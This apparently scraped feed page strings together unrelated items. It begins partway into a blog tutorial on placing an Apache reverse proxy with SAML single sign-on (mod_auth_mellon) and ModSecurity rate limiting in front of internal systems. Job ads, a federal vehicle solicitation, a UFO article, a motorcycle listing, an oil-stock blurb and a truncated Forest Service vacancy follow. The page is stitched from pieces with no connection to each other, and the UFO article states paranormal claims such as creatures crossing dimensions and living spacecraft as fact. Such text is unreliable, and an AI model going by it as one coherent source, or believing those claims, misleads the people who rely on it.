  2. Probably wouldn’t be exposed outside of the firewall/VPN at most companies because they were never designed to be Internet-facing

We are an enterprise, but only had a small handful of these ‘naughty’ systems. It wasn’t super cost-effective to jump into a 1500+ employee seat contract with Duo (now Cisco), Cloudflare Access, or ScaleFT Zero Trust Web Access1 just to solve this particular problem across a small number of hosts. Yet, employees were frustrated that most day-to-day operations did not require jumping on a corporate VPN until you had to reach one of these magical systems.

I designed a SAML-aware reverse-proxy using a combination of Apache 2.4, mod_auth_mellon, and a sprinkling of ModSecurity to add some rate limiting capabilities.  The following examples assume Ubuntu 16.04, but you can use whatever OS you’d like, assuming you know how to get the requisite packages.

Install dependencies and enable Apache modules

sudo apt-get install apache2 libapache2-mod-auth-mellon libapache2-modsecurity
sudo a2enmod proxy_http proxy ssl rewrite auth_mellon security2

Configure ModSecurity

Our ModSecurity install will do one thing and one thing only: rate limit (by IP) access attempts by non-authenticated users.

Create or overwrite /etc/modsecurity/modsecurity.conf and put the following content:

# A minimal ModSecurity configuration for rate limiting
# on a large number of HTTP 401 Unauthorized responses.
SecRuleEngine On
SecRequestBodyAccess On
SecRequestBodyLimit 13107200
SecRequestBodyNoFilesLimit 131072
SecRequestBodyInMemoryLimit 131072
SecRequestBodyLimitAction ProcessPartial
SecPcreMatchLimit 1000
SecPcreMatchLimitRecursion 1000
SecResponseBodyMimeType text/plain text/html text/xml
SecResponseBodyLimit 524288
SecResponseBodyLimitAction ProcessPartial
SecTmpDir /tmp/
SecDataDir /tmp/
SecAuditEngine RelevantOnly
SecAuditLogRelevantStatus "^(?:5|4(?!04))"
SecAuditLogParts ABIJDEFHZ
SecAuditLogType Serial
SecAuditLog /var/log/apache2/modsec_audit.log
SecArgumentSeparator &
SecCookieFormat 0
SecUnicodeMapFile unicode.mapping 20127
SecStatusEngine On

# ====================================
# Rate limiting rules below
# ====================================

# RULE: Rate-Limit on HTTP 401 response codes
# Set IP address value to a variable
SecAction "phase:1,initcol:ip=%{REMOTE_ADDR},id:'1006'"
# On HTTP status 401, increment a counter (block_script), and expire that value out of cache after 300s
SecRule RESPONSE_STATUS "@streq 401" "phase:3,pass,setvar:ip.block_script=+1,expirevar:ip.block_script=300,id:'1007'"
# On counter variable (block_script) being greater than or equal to '20', deny with HTTP 429 Too Many Requests
SecRule ip:block_script "@ge 20" "phase:3,deny,severity:ERROR,status:429,id:'1008'"
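As a sanity check on the SecAuditLogRelevantStatus pattern above: the PCRE `^(?:5|4(?!04))` selects every 5xx and 4xx status except 404. Assuming a GNU grep built with PCRE support (-P), you can confirm this locally:

```shell
regex='^(?:5|4(?!04))'
for code in 200 301 401 403 404 429 500 503; do
  # 4xx and 5xx responses match, except 404 (excluded by the negative
  # lookahead); 2xx/3xx never match and are skipped.
  if printf '%s' "$code" | grep -qP "$regex"; then
    echo "$code -> audited"
  else
    echo "$code -> skipped"
  fi
done
```

Note that an HTTP 429 produced by the rate-limit rule above is itself a 4xx, so those denials also land in the audit log, which is handy when verifying the limiter is firing.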

Feel free to add your own ModSecurity rules if you’d like to do things like detecting/blocking remote shell attempts, SQL injection, etc, but that’s not something I intend to cover here.

Modify the site (vhost) configuration

In case it’s non-obvious, in the following commands feel free to change out ‘myservicename’ with an appropriate identifier for service you are protecting with this gateway setup.

Head over to /etc/apache2/sites-enabled and open the vhost config file you intend to add protection to (or modify the default one, if this is a new install).

<IfModule mod_ssl.c>
 <VirtualHost _default_:443>
  ServerAdmin [email protected]
  [...]
  # MSIE 7 and newer should be able to use keepalive
  BrowserMatch "MSIE [17-9]" ssl-unclean-shutdown

  ProxyRequests Off
  ProxyPass /secret/ !

  # If fronting a locally-installed app, just forward to
  # the correct listening port. Alternatively,
  # you can address a system on another domain and port.
  ProxyPass / https://127.0.0.1:8000/ retry=10
  ProxyPassReverse / https://127.0.0.1:8000/

  ErrorDocument 401 "\
<html>\
<title>Access Restricted</title>\
<body>\
<h1>Access is restricted to organizational users.</h1>\
<p>\
<a href=\"/secret/endpoint/login?ReturnTo=/\"><strong>Click here to login via single sign-on, or wait for 2 seconds to be redirected automatically.</strong></a><br /><br /><br /><br /><a href=\"/#noredirect\">Temporarily disable redirection.</a><script>if(window.location.hash == \"\") { window.setTimeout(function(){ window.location.href = \"/secret/endpoint/login?ReturnTo=\" + encodeURIComponent(window.location.pathname + window.location.search); }, 2000); }</script>\
</p>\
</body>\
</html>"

  <Location />
   # Documentation on what these flags do can be found in the docs:
   # https://github.com/Uninett/mod_auth_mellon/blob/master/README.md
   MellonEnable "info"
   AuthType "Mellon"
   MellonVariable "cookie"
   MellonSamlResponseDump On
   MellonSPPrivateKeyFile /etc/apache2/mellon/urn_myservicenname.key
   MellonSPCertFile /etc/apache2/mellon/urn_myservicenname.cert
   MellonSPMetadataFile /etc/apache2/mellon/urn_myservicenname.xml
   MellonIdpMetadataFile /etc/apache2/mellon/idp.xml
   MellonEndpointPath /secret/endpoint
   MellonSecureCookie on
   # session cookie duration; 43200(secs) = 12 hours
   MellonSessionLength 43200
   MellonVariable "proxyweb"
   MellonUser "NAME_ID"
   MellonDefaultLoginPath /

   # This 'requirement' is actually going to be
   # optional. We also give some trusted IPs below,
   # and tell Apache we can fulfill either requirement.
   Require valid-user
   Order allow,deny

   # This is where you can whitelist IPs or
   # even entire network ranges, perfect for
   # systems that still need to accept
   # some API traffic from known networks.
   Allow from 10.20.30.0/24
   Allow from 10.10.110.66

   # Allow one of the above to be good enough.
   # You could change this to 'all' if you need
   # to satisfy SSO required AND valid network
   # required.
   Satisfy any
  </Location>

  <Location /secret/endpoint/>
   AuthType "Mellon"
   MellonEnable "off"
   Order Deny,Allow
   Allow from all
   Satisfy Any
  </Location>

 </VirtualHost>
</IfModule>
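If you started from a stock Debian/Ubuntu install, make sure the relevant modules are enabled before this vhost will work (module names here assume the Debian packaging of mod_auth_mellon and ModSecurity):

```
sudo a2enmod ssl proxy proxy_http headers auth_mellon security2
```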

Create SAML SP metadata files

We’ll download and use a shell script from the mod_auth_mellon authors to create the necessary SP metadata files:

sudo mkdir -p /etc/apache2/mellon/
cd /etc/apache2/mellon/
wget https://raw.githubusercontent.com/Uninett/mod_auth_mellon/master/mellon_create_metadata.sh
bash mellon_create_metadata.sh urn:myservicenname https://<YOURDOMAIN>/secret/endpoint

Now your directory structure should resemble the following:

root@host:/etc/apache2/mellon# ls
mellon_create_metadata.sh urn_myservicenname.cert urn_myservicenname.key urn_myservicenname.xml

mellon_create_metadata.sh is no longer needed and can be deleted, if you so choose.

Create the SAML 2.0 application profile on your IdP

Go to your identity provider and provision the new application. For this example, I’m using Okta (whom I highly recommend):

[Screenshot: the SAML 2.0 application setup wizard in the Okta admin console]

Place SAML IdP metadata

Finally, grab the IdP metadata and put it on your clipboard:

[Screenshot: copying the IdP metadata from the Okta admin console]

Drop its contents into a new file at /etc/apache2/mellon/idp.xml:

root@host:/etc/apache2/mellon# cat idp.xml
<?xml version="1.0" encoding="UTF-8"?>
<md:EntityDescriptor xmlns:md="urn:oasis:names:tc:SAML:2.0:metadata" entityID="http://www.okta.com/exkd2n9ujpQFaUq8f0h7">
<md:IDPSSODescriptor WantAuthnRequestsSigned="false" protocolSupportEnumeration="urn:oasis:names:tc:SAML:2.0:protocol">
<md:KeyDescriptor use="signing">
<ds:KeyInfo xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
<ds:X509Data>
<ds:X509Certificate>MIIDBzCCAe+gAwIBAgIJAJAD/4DMpp7vMA0GCSqGSIb3DQEB
[...]
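Since a malformed metadata file is a common cause of mellon startup failures, a quick well-formedness check can save a debugging round-trip (xmllint ships with libxml2):

```
xmllint --noout /etc/apache2/mellon/idp.xml && echo OK
```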

Restart Apache and Test

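Before reloading, it’s worth confirming that the configuration actually parses (standard Apache tooling; expect “Syntax OK”):

```
sudo apachectl configtest
```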
sudo systemctl reload apache2

Now head to your application and check out the results:

[Screenshot: the application now redirects to the identity provider’s sign-in page]

Redirected to an auth challenge – perfect!

Quickly adding SAML support to PHP/Python/Rails/Node/etc apps on the same host

The same principle can be used to quickly add SAML support to your organization’s homegrown applications that are fronted by an existing Apache 2 server. In your vhost config, inside the Mellon options, add:

<Location />
 [...]
 RequestHeader set Mellon-NameID %{MELLON_NAME_ID}e

In your application, simply check for a value in this header and use it if present. For instance, in Python’s Flask framework:

@login_manager.request_loader
def load_user_from_request(request):

    nameid = request.headers.get('Mellon-NameID')
    if nameid:
        user = User.query.filter_by(username=nameid).first()
        if user:
            return user
        # Provision the user's account for first use and persist it
        # (assumes the Flask-SQLAlchemy `db` session used elsewhere in the app)
        user = User(nameid)
        db.session.add(user)
        db.session.commit()
        return user

    # Return None if the header was absent, i.e. the user is not logged in
    return None

Back-end on another host

Some applications, like Splunk, can receive the logged-in user’s identity via a request header (note: Splunk now supports SAML natively, but it still makes for a good example app). We can direct mod_auth_mellon to send this header along with information about the authenticated user. Mellon populates the field ‘MELLON_NAME_ID’ with the IdP username (e.g. user@example.com) after successful authentication.

In your vhost config in the Mellon options, add:

<Location />
 [...]
 # Pass Splunk a request header declaring the user who has logged in
 # via SAML. The regex test at the end of this line ensures that
 # MELLON_NAME_ID is not an empty string before attempting to set
 # the SplunkWebUser header to the value of MELLON_NAME_ID.
 # Splunk unfortunately freaks out if the SplunkWebUser header is
 # declared but it has no value.
 RequestHeader set SplunkWebUser %{MELLON_NAME_ID}e "expr=-n %{env:MELLON_NAME_ID}"

Be careful to make sure your back-end application is only accessible via this reverse proxy, though; otherwise someone with local network access could simply send requests with this header directly to the back-end server and bypass authentication entirely [2]. In Splunk’s case, that’s what the values under ‘trustedIP’ in $SPLUNK_HOME/etc/system/local/web.conf are for.
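As one mitigation sketch (the addresses here are hypothetical; adapt them to your network), the back-end host can be firewalled so that only the gateway reaches the application port:

```
# Allow only the gateway (assumed to be 10.20.30.5) to reach the app on
# port 8000, then drop all other traffic to that port.
sudo iptables -A INPUT -p tcp --dport 8000 -s 10.20.30.5 -j ACCEPT
sudo iptables -A INPUT -p tcp --dport 8000 -j DROP
```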

Footnotes

1. ScaleFT’s overall offering appears to be very enticing, and I see their recent acquisition by Okta as a great development. Because it addresses several other pain points, we are actively working to deploy ScaleFT at my organization, which will likely replace the home-grown solution described in this post.

2. Do your part to prevent data breaches by seeking assistance from someone with relevant security experience if you are unsure whether or not your back-end application on another host is properly protected from such an attack.


          Telecommuting Customer Operations Engineer      Cache   Translate Page   Web Page Cache   
A software company is in need of a Telecommuting Customer Operations Engineer. Candidates will be responsible for the following: Contributing to process development Working with customers to resolve a wide range of issues Communicating with our core engineering team to provide real-time product feedback from the field Qualifications for this position include: Attending team events Experience in diagnosing, reproducing, and resolving customer issues Desire to make customers successful through direct interaction Excitement in learning about streaming data and becoming a domain expert in Apache Kafka
          Telecommuting Customer Operations Engineer      Cache   Translate Page   Web Page Cache   
A computer software company has an open position for a Telecommuting Customer Operations Engineer. Core Responsibilities Include: Improving product documentation and authoring knowledge base articles Contributing to process development Working with customers to resolve a wide range of issues Applicants must meet the following qualifications: Regular company wide and team events Desire to make customers successful through direct interaction Excitement in learning about streaming data and becoming a domain expert in Apache Kafka Experience in diagnosing, reproducing, and resolving customer issues
          Java Developer - ALTA IT Services, LLC - Clarksburg, WV      Cache   Translate Page   Web Page Cache   
Experience with the following technologies – J2EE, Weblogic, Java, Javascript, JQuery, AngularJS, Apache, Linux, Subversion, and GitHub....
From ALTA IT Services, LLC - Tue, 12 Jun 2018 17:33:52 GMT - View all Clarksburg, WV jobs
          Junior Full Stack Web Developer - Education Analytics - Madison, WI      Cache   Translate Page   Web Page Cache   
Web server technologies like Node.js, J2EE, Apache, Nginx, ISS, etc.,. Education Analytics is a non-profit organization that uses data analysis to inform...
From Education Analytics - Fri, 06 Jul 2018 11:19:28 GMT - View all Madison, WI jobs
          1 New Diesel Utility Vehicle and Accessories      Cache   Translate Page   Web Page Cache   
RFQ, COMBINED SYNOPSIS/SOLCITATION NOTICE

General Information
Document Type: RFQ
RFQ Number: RFQ-18-PHX-20
Posted Date: 08/07/2018
Response Date: 08/22/2018 @ 4:00 PM MST
Classification Code: 2320
Set Aside: 100% Native American Owned Small Business
NAICS Code: 333111

Contracting Office Address
Attention: Donovan Conley, Contract Specialist
IHS, Phoenix Area Office, Division of Acquisition Management
40 North Central Avenue, Two Renaissance Square
Phoenix, AZ 85004
Office: 602-364-5174
Email: donovan.conley@ihs.gov

Description
This is a combined synopsis/solicitation for commercial items prepared in accordance with the format in Subpart 12.6, as supplemented with additional information included in this notice. This announcement constitutes the only solicitation; quotes are being requested and a written solicitation will not be issued. The Government will award a firm-fixed price contract resulting from this combined synopsis/solicitation, to the responsible offeror whose offer is conforming to the "Brand Name or Equal" synopsis/solicitation where best value is expected when utilizing Lowest Price Technically Acceptable (LPTA) procedures.


This solicitation is issued under Request for Quotations (RFQ) and the solicitation number is RFQ-18-PHX-20. This acquisition is restricted to 100% Native American Owned Small Business. The North American Industry Classification System (NAICS) code is 333111 and the size standard is 1,250 employees. The quote document and incorporated provisions and clauses are those in effect through Federal Acquisition Circular 2005-96 / 11-06-2017.


The Whiteriver Service Unit's Facility Department is procuring for one (1) new diesel utility vehicle and accessories.


All questions regarding this RFQ for Items must be in writing and will be sent by email to donovan.conley@ihs.gov.


Questions must be received no later than 08/22/2018 at 12:00 PM MST. No further questions will be accepted after that date and time.


You are reminded that representatives from your company SHALL NOT contact any Whiteriver Service Unit's employees to discuss this RFQ during this RFQ process. All questions and concerns regarding this RFQ shall be directed to the Contracting Officer or Contract Specialist Donovan Conley.


Schedule, See Attachment Synopsis-Solicitation RFQ-18-PHX-20


PLEASE ENTER THE UNIT PRICE AND AMOUNT FOR THE CLIN(S) BELOW
Separate quotes shall include RFQ number on Quote.
Not providing a price for all CLINs would result in your offer as being nonresponsive to the solicitation.


FAR 52.211-6, Brand Name or Equal - All items must comply and must have the alike salient characteristics of the items stated below, to include technical documentation to support products being offered as equal items.



Basis of Award


This acquisition will utilize Lowest Price Technically Acceptable (LPTA) source selection procedures. This is a competitive LPTA best value source selection in which technically acceptable is considered the most important factor. By submission of its offer, the Offeror accepts all solicitation requirements, including terms and conditions, representations and certifications, and technical requirements. Failure to meet a requirement may result in an offer being determined technically unacceptable. Offerors must clearly identify any exception to the solicitation and conditions and provide complete accompanying rationale.


In order for an Offeror to be considered for award, the proposal must receive an "Acceptable" rating in every non-price factor. Any proposal receiving a rating of "Unacceptable" in any non-price factor will not be further evaluated.


The Government intends to award one (1) contract for this RFQ notice.


For the purpose of award, the government shall evaluate offers based on the evaluation factors described below:

FACTOR 1 - Technical (Acceptable/Unacceptable)
FACTOR 2 - Price


Factor 1 - Technical:


Offeror shall provide brief description of alike salient characteristics of the items stated in the Schedule, to include technical specification and product literature documentation to support products being offered as equal items.


The Government will evaluate the contractor's product technical specification and product literature to ensure that it reflect sound understanding of Factor 1 - Technical.


Ratings:
Acceptable
- Proposal clearly meets the minimum requirements of the solicitation.
Unacceptable - Proposal does not clearly meet the minimum requirements of the solicitation.


Factor 2 - Price:


The Government will evaluate the quote to determine the price fair and reasonableness in accordance with FAR 13.106-3(a).


Offer must be good for 60 calendar days after submission.


FOB Destination CONUS (Continental U.S.). Shipping charges shall be included in the purchase cost of the product. Sellers shall deliver the products on their own conveyance to the location listed on the award.



Quotations Preparations Instructions: A completed quotation consist of four parts.


a) Technical: Provide brief description of alike salient characteristics of the items stated above, to include technical documentation to support products being offered as equal items.


b) Price Schedule: Provide product information and price(s) for all Contract Line Item Number (CLIN) numbers. Include manufacturer name and model number, description of supply, unit of issue, unit price, extended total amount and grand total. Nott providing a price for all CLINs would result in your offer as being nonresponsive to the solicitation.


c) In order to be considered for an award, an offeror must have completed the online electronic Representations and Certifications located at https://www.sam.gov/ in accordance with FAR 4.1201(a). By submission of an offer, the offeror acknowledges the requirement that a prospective awardee shall be registered in SAM at https://www.sam.gov/ prior to award, during performance, and through final payment of any contract, basic agreement, basic ordering agreement, or blanket purchasing agreement resulting from this solicitation [Note: Lack of registration in the System for Award Management will make an offeror ineligible for award.].


d) Offeror to fill out Contract Administrative Data in attachment SAP Clauses and Contract Administrative Data


Clauses: See attachment, SAP Clauses and Contract Administrative Data
Provisions: See attachment, Provisions


Set-aside code: Indian Small Business Economic Enterprises Place of performance:  Whiteriver Service Unit 400 West Apache Drive, Facility Dept. Whiteriver, AZ  85941  US Contact: Donovan Conley, Contract Specialist, Phone 602-364-5174, Fax 602-364-5030, Email donovan.conley@ihs.gov - Brian G Numkena, Contract Specialist, Phone 602-364-5020, Email brian.numkena@ihs.gov
           "WHAT? ... ANOTHER CUBE?" -> THE TEXAS BLACK CUBES ... A 2nd PHOTO-      Cache   Translate Page   Web Page Cache   
The first picture of the appearance of an unidentified black cube over Texas.

 

"Another Cube..." 

The 2nd Black Cube photo

By Mary Alice Bennett

(Copyright 2015, Mary Alice Bennet - All rights Reserved)

<Edited by Robert D. Morningstar>

*******

Michael Nielson: -> "Another cube reportedly seen in Texas.  Its either the vanguard of the Borg assimilation fleet or its a kite flown by the Borgmans.  My question is simple:

 "Why would an advanced race of beings travel 100-trillion miles just to hover in the clouds over McAllen, Texas in their decidedly poorly aerodynamic cube?

Why not a sphere?

 Are they here for our spherical technology...or...the TexMex....?"

 

*******

The 1st "Black Cube" Photo.

The black color of this perfect cube reminds me of the color of mourners and the fact that was are missing our editor Dirk, is this phenomenon a tribute to him? The manifestation of the shape out of the atmosphere reminds me of the paranormal activities in Uintah, Utah at Skniwalker Ranch: Paranormal Corridor - Southwest USA by Mary Alice Bennett Skinwalker Ranch "Using infrared binoculars, a researcher in Utah was able to observe a large black animal crawling through a tunnel into our dimension. The ape-like creature moved along using its elbows. After exiting and sauntering off into the night, the anomalous yellow light which contained the tunnel, slowly faded away. This is but one of the events which occurred on the Skinwalker Ranch property while paranormal researchers were there. The tunnel appeared after a meditation session.

After another earlier attempt at meditating, an energy field was seen to swoop down upon the seated fellow. It uttered an animal roar as it sped by - the meditator was completely terrified. The researchers compared what they`d seen to the invisible force scene from the movie "Predator". Some of the other creatures who populate the Uintah Basin in N.E. Utah are only detectable because they block out the stars or by the enormous foot or claw prints that they leave behind. The rancher and his family had moved there in good faith, bringing their expensive herd of Angus cattle to the property. They lost so many cows there that they eventually had to leave, allowing the research team to take their place. Whatever is there does not allow domesticated livestock to pollute its sacred ground. Previous tenants had been warned not to try to dig anywhere on the land. In the 1770s the exploring Spanish had noticed underground activity there along with flying lights. The Ute tribe has 15 generations of tales to tell. There are deposits of the rare hydrocarbon Gilsonite on the ranch.

The UFO underground mining activity is similar to the situation in Pine Bush, New York. Large black flying triangles are seen in both areas. The rancher had seen a craft entering the atmosphere through a hole in the sky. At night he was able to see blue sky through one of these openings, as if it were the entrance to another world. There was another tunnel up there whose entrance opened directly opposite their homestead. Many of the sightings of anomalous creatures were one-time events, as if the animals were just passing through our dimension. When they first came to the land, the rancher`s wife was greeted at the gate by an oversized wolf that had to lean down in order to gaze into her car window. This sighting is reminiscent of the paranormal black dog of Norfolk, England which inspired the Sherlock Holmes mystery, "The Hound of the Baskervilles". "Black Shuck" as they call him, once appeared in a church, killing two people on his way out. The burn marks he left as he retreated are still visible on the doorway. There had been no repopulation of wolves to the Uinta region.

Soon after this encounter, the rancher`s wife observed what seemed to be an RV out in the field. There was a dark figure seated behind a desk inside. When he stood up, he took up the entire doorway. He was wearing a black helmet with a visor, black clothes and boots. The next day she and her husband went out to the field. When she saw the 18" bootprints he`d left behind, she became hysterical. The RV-type craft has also been seen in Brazil where they are called "chupas". These UFOs have been known to hunt the Amazonian hunters who wait in the trees at night for animals to pass by. A darting red light chased the horses off a cliff one night resulting in serious injuries. Sometimes the animals were seen to panic from the presence of invisible creatures.

The rancher advised the research team to stalk the phenomenon as if it were a wild animal.  He`d observed a multicolored craft one night which lit up the snow with its colorful lights.  When a twig broke, the craft turned off its lights and turned towards him.  The rancher thought that this was the type of reaction that one would expect from a living creature.  In Dulce, New Mexico, sightings of enormous UFOs are not uncommon.  One huge manta-ray shaped ship appeared to be covered with the skin of a sea creature.   It was grey, dimpled, and wrinkled.   A little ET was spotted with the same sort of skin.

Some theorize that the craft themselves are alive. This echoes the words of Ezekiel in his first chapter, the famous Biblical UFO encounter.  Ezekiel refers to the "wheel within a wheel" form of the "Throne of God" and to the "living creatures," which accompany the wheels flying in the sky.

The area of N.W. New Mexico is also famous for its suit-wearing "Wolfmen" and ghastly-faced " ghost runners," which have been known to keep pace with the patrol cars of the Highway Patrol.

How do you know whether it was a Bigfoot who raided your garden?

Answer: Only the fruit on the top of the tree is gone.

Last week, there was a sighting of a white Bigfoot up in Fort Apache, Arizona.  Since these animals are known to appear on or near Indian reservations, the news was not a surprise.  The author likes it noted that all of the examples used in this article were taken from the book "The Hunt for the Skinwalker", but the comparisons were not." (Available on Amazon).

 

The appearance of a large black Bigfoot from a conduit coming out of the sky in Utah is similar to the manifestation of the black cubes from the clouds over Texas.

"What is Gilsonite?"

"Gilsonite is a natural, resinous hydrocarbon found in the Uintah Basin in northeastern Utah; thus, it is also called Uintahite.  This natural asphalt is similar to a hard petroleum asphalt and is often called a natural asphalt, asphaltite, uintaite, or asphaltum.  Gilsonite is soluble in aromatic and aliphatic solvents, as well as petroleum asphalt.  Due to its unique compatibility,  Gilsonite is frequently used to harden softer petroleum products.  Gilsonite in mass is a shiny, black substance similar in appearance to the mineral obsidian.  It is brittle and can be easily crushed into a dark brown powder.  When added to asphalt cement or hot mix asphalt in production,  Gilsonite helps produce paving mixes of dramatically increased stability."

This dramatic event and this article memorializes for me our much esteemed and greatly missed editor Dirk. 

IN MEMORIAM: -> DIRK VANDER PLOEG, UFO DIGEST PUBLISHER, PASSES on JUNE 26TH, 2015

Mary Alice Bennett

July 27th, 2015

Extra information about the article: 
Some comparitive information concernig a recent paranormal phenomenon in the sky over Texas.
Categories: 

           2010 TVS Apache RTR 44000 Kms       Cache   Translate Page   Web Page Cache   
Price: ₹ 24,000, Model: Apache RTR, Year: 2010 , KM Driven: 44,000 km,
2010 TVS Apache RTR 44000 Kms https://www.olx.in/item/2010-tvs-apache-rtr-44000-kms-ID1mBRPP.html
          These Oil Stocks Just Cashed in on the Permian Basin Pipeline Craze      Cache   Translate Page   Web Page Cache   
Apache and Occidental Petroleum snagged premium prices for their midstream assets in the red-hot shale oil region.
          (USA-AZ-Springerville) Wildlife Biologist      Cache   Translate Page   Web Page Cache   
* Videos * Duties Help ## Duties ### Summary Positions open to current permanent Federal employees with competitive status, CTAP/RPL/ICTAP, VEOA eligibles, Land Management Workforce Flexibilty Act, Farm Service Agency permanent county employees, Public Land Corps, and Resource Assistant Program eligibles. These positions are located on a Forest Service Unit and responsible for providing professional wildlife expertise in the protection, management, and improvement of wildlife within the framework of multiple-use management of forest and range lands. Seven positions are being filled by this vacancy announcement, one at each of the following locations. 1. Lincoln National Forest, Sacramento Ranger District in Cloudcroft, NM. For additional information about this position, please contact Phillip Hughes at 682-5302 or philliphughes@fs.fed.us. 2. San Bernadino National Forest, Front Country Ranger District in Lytle Creek, CA. For additional information about this position, please contact Joseph Rechsteiner at 909-382-2860 or jrechsteiner@fs.fed.us. 3. National Forests in Texas, Angelina-Sabine Ranger District in Zavalla, TX. For additional information about this position, please contact Ron Hasken at 936-897-1068 or rhasken@fs.fed.us. 4. Hiawatha National Forest, Munising Ranger District in Munising, MI. For additional information about this position, please contact Luke Langstaff at 906-387-2512 ext. 1026 or langstaff@fs.fed.us. 5. Apache-Sitgreaves National Forest, Springerville Ranger District in Springerville, AZ. For additional information about this position, please contact Valerie Horncastle at 928-333-6234 or vhorncastle@fs.fed.us. 6. Wayne National Forest, Ironton Ranger District in Pedro, OH. For additional information about this position, please contact Dana Moler at 740-753-0905 or dmoler@fs.fed.us. 7. Wayne National Forest, Athens Ranger District in Nelsonville, OH. 
For additional information about this position, please contact Dana Moler at 740-753-0905 or dmoler@fs.fed.us. Pay rates vary depending on location. Pay rates displayed above are for the Rest of the U.S. (RUS). See the OPM website at http://www.opm.gov/policy-data-overisght/pay-leave/salaries-wages/ for additional information on pay rates for specific locations. Learn more about this agency ### Responsibilities **Duties listed are at the full performance level:** Provides technical advice and leadership for a wildlife management program. This includes gathering, compiling, and analyzing data to determine wildlife habitat requirements and management needs; assessing habitat quality and quantity, interpreting biological requirements for all wildlife species and their habitat; inventorying and monitoring habitat and in some cases populations; determining the need for and recommending wildlife habitat restoration, enhancement or improvement projects; and studying and recommending solutions to special coordination problems involving wildlife habitat protection. Performs specific portions or minor phases of assignments in support of Integrated Resource Inventory (IRI) activities. Incumbent prepares field data to be digitized; digitizes data and processes data for use in geographic information systems (GIS). Documents field procedures and office methodologies produced by IRI team to develop information on IRI data layers. Works cooperatively with State and/or other wildlife resource agencies. Coordinates wildlife management with timber, grazing, minerals and recreation and other land management programs. This includes gathering information for wildlife management plans, surveys of game and nongame occurrence, mapping key habitat for suitability, determination of annual browse utilization and/or amount of soil disturbance, joint recommendations for annual game harvest, and the need for wildlife habitat development or restoration. 
Prepares wildlife management input for the unit land management planning team. Prepares environmental analysis reports. Develops biological evaluations/biological assessments for review by journey-level biologists. Recommends, prepares, or reviews annual operating plans and budgets for wildlife habitat improvement and animal damage control projects in consideration of biological needs, project standards, and the needs of other resources. Participates in wildlife monitoring program activities by making observations, gathering data, and reporting findings. Gathers information to be used in environmental assessments and environmental impact statements affecting wildlife resources. Develops plans for information and education activities in wildlife conservation. Responsible for assigned areas of public relation activities, such as speaking at meetings and participating in field trips. Serves as project leader on wildlife habitat improvement projects and participates on interdisciplinary teams in all aspects of natural resource management, which may include program evaluation. Manages partnership programs for wildlife and rare plants. ### Travel Required Occasional travel - Occasional travel may be required for field visits and training. ##### Supervisory status No ##### Promotion Potential 09 ### Who May Apply #### This job is open to… Current permanent Federal employees with competitive status, Land Management Workforce Flexibility Act, CTAP/RPL/ICTAP, VEOA; Farm Service Agency permanent county employees; Public Land Corp eligibles; and Resource Assistant Program eligibles. Questions? This job is open to 4 groups. 
* #### Job family (Series) 0486 Wildlife Biology #### Similar jobs * Biologists, Wildlife * Wildlife Biologists * Requirements Help ## Requirements ### Conditions of Employment * You must be a US Citizen or US National * Males born after 12/31/59 must be Selective Service registered or exempt * Successful completion of a one-year probationary period required. **ADDITIONAL INFORMATION: **Selectee will be responsible for tax obligations related to payments for moving expenses (2017 Tax Cuts and Jobs Act, Public Law 115-97). Questions should be directed to the Travel Help Desk, 877-372-7248, Option 1, or email asctos@fs.fed.us. **Apache-Sitgreaves NF, Springerville RD in Springerville, AZ.**Fill at Grade Level(s): GS-7/9 Bargaining Unit: No TOS: Mandatory allowance with temporary quarters (30 days)** Lincoln NF, Sacramento RD in Cloudcroft, NM****Fill at Grade Level(s): GS-7/9 Bargaining Unit: No TOS: Full**** **San Bernadino NF, Front Country RD in Lytle Creek, CA.** Fill at Grade Level(s): GS-7/9 Bargaining Unit: No TOS: Basic moving expenses; other relocation benefits will be negotiated with selectee. **NFs in Texas, Angelina-Sabine RD in Zavalla, TX.** Fill at Grade Level(s): GS-7/9 Bargaining Unit: Position not included in the bargaining unit. TOS: Mandatory TOS only (one way move, movement and storage of household goods) **Hiawatha NF, Munising RD in Munising, MI.** Fill at Grade Level(s): GS-7/9 TOS expenses paid: House Hunting Trip and Temporary Quarters. Bargaining Unit: Yes (NFFE - Local Lodge 2086) **Wayne NF, Ironton RD in Pedro, OH.** Fill at Grade Level(s): GS-5/7/9 TOS expenses paid: House Hunting Trip and Temporary Quarters. Bargaining Unit: No **Wayne NF, Athens District in Nelsonville, OH.** Fill at Grade Level(s): GS-5/7/9 TOS expenses paid: House Hunting Trip and Temporary Quarters. Bargaining Unit: No Positions may be filled as career ladders or could be filled at the full performance level dependent upon the individual unit’s needs. 
Example: The selecting official may select at any grade to include the full performance level of the position. However, not all positions will be filled at the highest grade level. If you are selected for a position with further promotion potential, you will be placed under a career development plan, and may be non-competitively promoted if you successfully complete the requirements and if recommended by management. However, promotion is not guaranteed. ### Qualifications Applicants must meet all qualifications and eligibility requirements as defined below by the closing date of the announcement. For more information on the qualifications for this position, go to: https://www.opm.gov/policy-data-oversight/classification-qualifications/general-schedule-qualification-standards/0400/fish-biology-series-0482/ **Wildlife Biology Series (0486) Basic Requirements:** Degree: Successful completion of a full 4-year course of study in an accredited college or university leading to a bachelor's or higher degree that included a major field of study in biological science that included at least 9 semester hours in such wildlife subjects as mammalogy, ornithology, animal ecology, wildlife management, or research courses in the field of wildlife biology; and at least 12 semester hours in zoology in such subjects as general zoology, invertebrate zoology, vertebrate zoology, comparative anatomy, physiology, genetics, ecology, cellular biology, parasitology, entomology, or research courses in such subjects (Excess courses in wildlife biology may be used to meet the zoology requirements where appropriate.); and At least 9 semester hours in botany or the related plant sciences * OR- Combination of education and experience: equivalent to a major in biological science (i.e., at least 30 semester hours), with at least 9 semester hours in wildlife subjects, 12 semester hours in zoology, and 9 semester hours in botany or related plant science, as shown in A above, plus appropriate experience 
or additional education. Experience refers to paid and unpaid experience, including volunteer work done through National Service programs (e.g., Peace Corps, AmeriCorps) and other organizations (e.g., professional; philanthropic; religious; spiritual; community, student, social). Volunteer work helps build critical competencies, knowledge, and skills and can provide valuable training and experience that translates directly to paid employment. You will receive credit for all qualifying experience, including volunteer experience. **GS-05:** Applicants who meet the basic requirements described in the individual occupational requirements are fully qualified for the specified entry grade level (no additional requirements). **GS-07:** In addition to the requirements described above, the following education and/or experience are required for the GS-07 level: One year or more of specialized experience equivalent to at least the GS-05 grade level; **OR** One full year of graduate level education; **OR** An appropriate combination of graduate level education and specialized experience; **OR** Superior Academic Achievement (go to this site to determine if you are eligible: http://www.opm.gov/qualifications/policy/ApplicationOfStds-04.asp). The education must have been obtained in an accredited college or university and demonstrate the knowledge, skills, and abilities necessary to do the work. Specialized experience at the GS-05 